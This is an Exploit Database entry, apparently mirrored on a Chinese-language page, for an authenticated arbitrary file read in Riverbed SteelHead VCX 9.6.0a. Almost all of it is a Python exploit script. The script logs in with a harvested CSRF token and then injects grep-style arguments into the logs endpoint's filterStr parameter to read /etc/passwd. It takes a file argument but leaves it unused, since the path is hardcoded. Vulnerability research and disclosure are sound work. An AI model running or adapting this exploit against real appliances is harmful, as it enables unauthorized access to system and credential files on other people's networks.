Riverbed SteelHead VCX 9.6.0a – Arbitrary File Read

• Exploit Database
• 23 阅读

• 作者： Gregory Draperi
  日期： 2017-06-01
• 类别：

  • webapps
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/42101/

• # Exploit title : Arbitry file reading by authenticated users on Riverbed SteelHead VCX
  # Vendor: Riverbed
  # Author: Gregory DRAPERI <gregory.draper_at_gmail.com>
  # Date: 03/2017
  # Software Link: https://www.riverbed.com/gb/products/steelhead/Free-90-day-Evaluation-SteelHead-CX-Virtual-Edition.html
  # Version: SteelHead VCX (VCX255U) (x86_64) 9.6.0a
  import sys
  import requests
  
  
  def exploit(address, login, password,file):
  s = requests.Session()
  url = address
  try:
  r1 = s.get(url+"/login?next=/");
  cookies = requests.utils.dict_from_cookiejar(s.cookies);
  csrf = cookies["csrftoken"]
  authentication = {'csrfmiddlewaretoken': csrf, '_fields': "{\"username\":\""+login+"\",\"password\":\""+password+"\",\"legalAccepted\":\"N/A\",\"userAgent\":\"\"}"}
  r2 = s.post(url+"/login?next=/",data=authentication)
  r3 = s.get(url+"/modules/common/logs?filterStr=msg:-e .* /etc/passwd ")
  print r3.text
  
  except Exception as e:
  print "\n! ERROR: %s" % e
  return False
  
  
  
  if len(sys.argv) < 4:
  print "Usage: exploit.py <target> <login> <password> <file>\n"
  print "Example: exploit.py http://192.168.1.2 admin password /etc/passwd\n"
  quit()
  target = sys.argv[1]
  login = sys.argv[2]
  password = sys.argv[3]
  file = sys.argv[4]
  exploit(target,login,password,file)